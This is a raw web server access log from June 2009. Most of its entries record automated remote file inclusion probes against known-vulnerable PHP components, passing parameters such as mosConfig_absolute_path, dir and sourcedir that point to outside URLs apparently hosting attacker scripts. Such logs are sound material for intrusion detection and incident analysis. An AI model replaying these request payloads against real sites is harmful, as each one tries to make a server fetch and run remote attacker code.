122.153.28.140 - - [28/Jun/2009:06:12:39 -0400] "GET /log/sdaglobal.org-access_log%20%20/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 326
125.131.116.12 - - [28/Jun/2009:06:12:51 -0400] "GET /log/sdaglobal.org-access_log.2//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 339
125.131.116.12 - - [28/Jun/2009:06:12:51 -0400] "GET /log//include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 312
125.131.116.12 - - [28/Jun/2009:06:12:55 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 308
122.153.28.140 - - [28/Jun/2009:06:12:56 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 295
122.153.28.140 - - [28/Jun/2009:06:12:56 -0400] "GET /log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 299
122.153.28.140 - - [28/Jun/2009:06:12:56 -0400] "GET /log/sdaglobal.org-access_log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 324
217.147.29.190 - - [28/Jun/2009:06:13:26 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 345
217.147.29.190 - - [28/Jun/2009:06:13:28 -0400] "GET /log//modules/agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 318
217.147.29.190 - - [28/Jun/2009:06:13:29 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 314
124.0.103.194 - - [28/Jun/2009:06:15:26 -0400] "GET /log//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 295
124.0.103.194 - - [28/Jun/2009:06:15:26 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 324
124.0.103.194 - - [28/Jun/2009:06:15:29 -0400] "GET //index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 291
124.0.103.194 - - [28/Jun/2009:06:15:32 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 322
77.232.68.137 - - [28/Jun/2009:06:17:21 -0400] "GET /log/sdaglobal.org-access_log%20%20/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 312
77.232.68.137 - - [28/Jun/2009:06:17:21 -0400] "GET /?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 200 9432
77.232.68.137 - - [28/Jun/2009:06:17:21 -0400] "GET /log/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 200 58325
124.0.103.194 - - [28/Jun/2009:06:20:09 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 322
124.0.103.194 - - [28/Jun/2009:06:20:09 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_custompages&cpage=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320
217.147.29.190 - - [28/Jun/2009:06:20:39 -0400] "GET /log/sdaglobal.org-access_log.2//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 379
217.147.29.190 - - [28/Jun/2009:06:20:42 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 348
65.55.208.245 - - [28/Jun/2009:06:21:47 -0400] "GET /log/education.hitechemall.com-access_log.2 HTTP/1.1" 200 346883
122.153.28.140 - - [28/Jun/2009:06:22:01 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 295
122.153.28.140 - - [28/Jun/2009:06:22:01 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 295
122.153.28.140 - - [28/Jun/2009:06:22:07 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 295
122.153.28.140 - - [28/Jun/2009:06:22:07 -0400] "GET /log/sdaglobal.org-access_log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 324
122.153.28.140 - - [28/Jun/2009:06:22:07 -0400] "GET /log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 299
122.153.28.140 - - [28/Jun/2009:06:22:11 -0400] "GET /log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 299
122.153.28.140 - - [28/Jun/2009:06:22:11 -0400] "GET /log/sdaglobal.org-access_log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 324
122.153.28.140 - - [28/Jun/2009:06:22:14 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 295
122.153.28.140 - - [28/Jun/2009:06:22:14 -0400] "GET /log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 299
122.153.28.140 - - [28/Jun/2009:06:22:14 -0400] "GET /log/sdaglobal.org-access_log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 324
122.153.28.140 - - [28/Jun/2009:06:22:14 -0400] "GET /log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 299
122.153.28.140 - - [28/Jun/2009:06:22:14 -0400] "GET /log/sdaglobal.org-access_log/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=&search_word=&cid=&PHPSESSID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 324
65.55.208.245 - - [28/Jun/2009:06:23:11 -0400] "GET /log/filipino.sdaglobal.org-error_log HTTP/1.1" 200 213
65.55.208.245 - - [28/Jun/2009:06:23:12 -0400] "GET /log/thai.sdaglobal.org-access_log.2 HTTP/1.1" 200 9760
65.55.208.245 - - [28/Jun/2009:06:23:12 -0400] "GET /log/gce.sdaglobal.org-access_log.3 HTTP/1.1" 200 15700
217.147.29.190 - - [28/Jun/2009:06:23:52 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 381
217.147.29.190 - - [28/Jun/2009:06:27:09 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 317
217.147.29.190 - - [28/Jun/2009:06:27:09 -0400] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 321
72.30.142.107 - - [28/Jun/2009:06:27:11 -0400] "GET /robots.txt HTTP/1.0" 404 291
72.30.142.107 - - [28/Jun/2009:06:27:11 -0400] "GET /log/hkmc.sdaglobal.org-access_log.3 HTTP/1.0" 200 6601
217.147.29.190 - - [28/Jun/2009:06:27:13 -0400] "GET /log/sdaglobal.org-access_log.2%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 350
217.147.29.190 - - [28/Jun/2009:06:27:35 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 348
65.23.158.226 - - [28/Jun/2009:06:30:37 -0400] "GET /log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 323
65.23.158.226 - - [28/Jun/2009:06:30:37 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 319
65.23.158.226 - - [28/Jun/2009:06:30:37 -0400] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 348
65.23.158.226 - - [28/Jun/2009:06:31:54 -0400] "GET /log/sdaglobal.org-error_log.2//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 349
217.147.29.190 - - [28/Jun/2009:06:33:09 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 328
217.147.29.190 - - [28/Jun/2009:06:33:09 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 332
65.23.158.226 - - [28/Jun/2009:06:33:27 -0400] "GET /log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 323
65.23.158.226 - - [28/Jun/2009:06:33:27 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 319
65.23.158.226 - - [28/Jun/2009:06:33:27 -0400] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 348
65.23.158.226 - - [28/Jun/2009:06:34:27 -0400] "GET /log/sdaglobal.org-error_log.2//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 349
77.232.68.137 - - [28/Jun/2009:06:34:39 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 310
218.234.21.178 - - [28/Jun/2009:06:39:09 -0400] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 348
218.234.21.178 - - [28/Jun/2009:06:39:09 -0400] "GET /log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 323
218.234.21.178 - - [28/Jun/2009:06:39:09 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 319
218.234.21.178 - - [28/Jun/2009:06:40:54 -0400] "GET /log/sdaglobal.org-error_log.2//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 349
218.234.21.178 - - [28/Jun/2009:06:42:40 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 319
218.234.21.178 - - [28/Jun/2009:06:42:40 -0400] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 348
218.234.21.178 - - [28/Jun/2009:06:42:40 -0400] "GET /log//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 323
125.131.116.12 - - [28/Jun/2009:06:43:05 -0400] "GET /log/sdaglobal.org-access_log.2//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 336
125.131.116.12 - - [28/Jun/2009:06:43:05 -0400] "GET //include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 305
125.131.116.12 - - [28/Jun/2009:06:43:06 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 309
125.131.116.12 - - [28/Jun/2009:06:44:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 305
125.131.116.12 - - [28/Jun/2009:06:44:01 -0400] "GET /log/sdaglobal.org-access_log.2//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 336
125.131.116.12 - - [28/Jun/2009:06:44:01 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 309
218.234.21.178 - - [28/Jun/2009:06:44:57 -0400] "GET /log/sdaglobal.org-error_log.2//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 349
173.1.96.154 - - [28/Jun/2009:06:46:49 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 316
125.131.116.12 - - [28/Jun/2009:06:47:12 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 334
66.249.68.226 - - [28/Jun/2009:06:47:51 -0400] "GET /log/andrea.hitechemall.com-error_log.1 HTTP/1.1" 200 24301
125.131.116.12 - - [28/Jun/2009:06:48:26 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 334
173.1.96.154 - - [28/Jun/2009:06:50:00 -0400] "GET /log/sdaglobal.org-access_log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 345
173.1.96.154 - - [28/Jun/2009:06:50:00 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 316
173.1.96.154 - - [28/Jun/2009:06:50:00 -0400] "GET /log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 320
89.223.3.98 - - [28/Jun/2009:06:50:06 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310
89.223.3.98 - - [28/Jun/2009:06:50:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 341
89.223.3.98 - - [28/Jun/2009:06:50:06 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 314
89.223.3.98 - - [28/Jun/2009:06:50:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 341
89.223.3.98 - - [28/Jun/2009:06:50:06 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 314
89.223.3.98 - - [28/Jun/2009:06:50:06 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310
217.147.29.190 - - [28/Jun/2009:06:50:59 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 325
217.147.29.190 - - [28/Jun/2009:06:51:05 -0400] "GET /log/sdaglobal.org-access_log.2%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 358
65.23.158.226 - - [28/Jun/2009:06:52:06 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 310
65.23.158.226 - - [28/Jun/2009:06:52:06 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 314
65.23.158.226 - - [28/Jun/2009:06:52:07 -0400] "GET /log/sdaglobal.org-error_log.1//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 340
86.109.166.161 - - [28/Jun/2009:06:52:32 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 329
86.109.166.161 - - [28/Jun/2009:06:52:32 -0400] "GET /log/sdaglobal.org-access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 354
86.109.166.161 - - [28/Jun/2009:06:52:33 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 325
86.109.166.161 - - [28/Jun/2009:06:52:34 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 325
86.109.166.161 - - [28/Jun/2009:06:52:34 -0400] "GET /log/sdaglobal.org-access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 354
86.109.166.161 - - [28/Jun/2009:06:52:34 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 329
65.23.158.226 - - [28/Jun/2009:06:52:54 -0400] "GET /log/sdaglobal.org-access_log//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 339
211.189.18.73 - - [28/Jun/2009:06:56:01 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 317
211.189.18.73 - - [28/Jun/2009:06:56:01 -0400] "GET /log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 321
89.223.3.98 - - [28/Jun/2009:06:56:43 -0400] "GET /log/sdaglobal.org-access_log//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 339
86.109.166.161 - - [28/Jun/2009:06:57:35 -0400] "GET /log/sdaglobal.org-error_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 355
86.109.166.161 - - [28/Jun/2009:06:57:35 -0400] "GET /log/sdaglobal.org-error_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 355
216.246.98.115 - - [28/Jun/2009:06:58:25 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 293
216.246.98.115 - - [28/Jun/2009:06:58:34 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 293
211.189.18.73 - - [28/Jun/2009:06:59:14 -0400] "GET /log/sdaglobal.org-access_log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 346
86.109.166.161 - - [28/Jun/2009:07:00:12 -0400] "GET /log/sdaglobal.org-error_log.2%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 356
86.109.166.161 - - [28/Jun/2009:07:00:19 -0400] "GET /log/sdaglobal.org-error_log.2%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 356
210.205.57.2 - - [28/Jun/2009:07:01:28 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 316
218.234.21.178 - - [28/Jun/2009:07:01:30 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 314
218.234.21.178 - - [28/Jun/2009:07:01:30 -0400] "GET /log/sdaglobal.org-error_log.1//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 340
218.234.21.178 - - [28/Jun/2009:07:01:30 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 310
218.234.21.178 - - [28/Jun/2009:07:01:39 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 310
218.234.21.178 - - [28/Jun/2009:07:01:39 -0400] "GET /log/sdaglobal.org-error_log.1//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 340
218.234.21.178 - - [28/Jun/2009:07:01:39 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 314
218.234.21.178 - - [28/Jun/2009:07:02:25 -0400] "GET /log/sdaglobal.org-access_log//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 339
83.13.191.186 - - [28/Jun/2009:07:02:35 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 341
83.13.191.186 - - [28/Jun/2009:07:02:35 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 314
83.13.191.186 - - [28/Jun/2009:07:02:35 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310
218.234.21.178 - - [28/Jun/2009:07:02:51 -0400] "GET /log/sdaglobal.org-access_log//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 339
83.13.191.186 - - [28/Jun/2009:07:03:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 341
83.13.191.186 - - [28/Jun/2009:07:03:06 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310
83.13.191.186 - - [28/Jun/2009:07:03:06 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 314
78.46.7.41 - - [28/Jun/2009:07:04:18 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 404 310
78.46.7.41 - - [28/Jun/2009:07:04:18 -0400] "GET /?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 200 9432
78.46.7.41 - - [28/Jun/2009:07:04:19 -0400] "GET /log/?sourcedir=http://www.leensysteem.nl//cmdstate.txt? HTTP/1.1" 200 58328
65.23.158.226 - - [28/Jun/2009:07:05:21 -0400] "GET /log/sdaglobal.org-error_log.2//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 340
217.147.29.190 - - [28/Jun/2009:07:07:29 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 330
217.147.29.190 - - [28/Jun/2009:07:07:30 -0400] "GET /log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 334
216.246.98.115 - - [28/Jun/2009:07:09:56 -0400] "GET /log/sdaglobal.org-access_log//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 322
216.246.98.115 - - [28/Jun/2009:07:09:56 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 293
216.246.98.115 - - [28/Jun/2009:07:09:56 -0400] "GET /log//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 297
216.246.98.115 - - [28/Jun/2009:07:10:05 -0400] "GET /log/sdaglobal.org-access_log//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 322
216.246.98.115 - - [28/Jun/2009:07:10:06 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 293
216.246.98.115 - - [28/Jun/2009:07:10:06 -0400] "GET /log//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 297
216.246.98.115 - - [28/Jun/2009:07:12:04 -0400] "GET /log/sdaglobal.org-error_log.1//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 323
67.215.238.186 - - [28/Jun/2009:07:12:12 -0400] "GET /log/index.php HTTP/1.1" 404 294
216.246.98.115 - - [28/Jun/2009:07:12:15 -0400] "GET /log/sdaglobal.org-error_log.1//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 323
80.93.48.103 - - [28/Jun/2009:07:18:25 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 333
218.234.21.178 - - [28/Jun/2009:07:20:08 -0400] "GET /log/sdaglobal.org-error_log.2//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 340
218.234.21.178 - - [28/Jun/2009:07:20:13 -0400] "GET /log/sdaglobal.org-error_log.2//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 340
210.205.57.2 - - [28/Jun/2009:07:22:44 -0400] "GET /log/sdaglobal.org-access_log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 345
210.205.57.2 - - [28/Jun/2009:07:22:45 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 316
210.205.57.2 - - [28/Jun/2009:07:22:46 -0400] "GET /log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 320
217.147.29.190 - - [28/Jun/2009:07:23:59 -0400] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 330
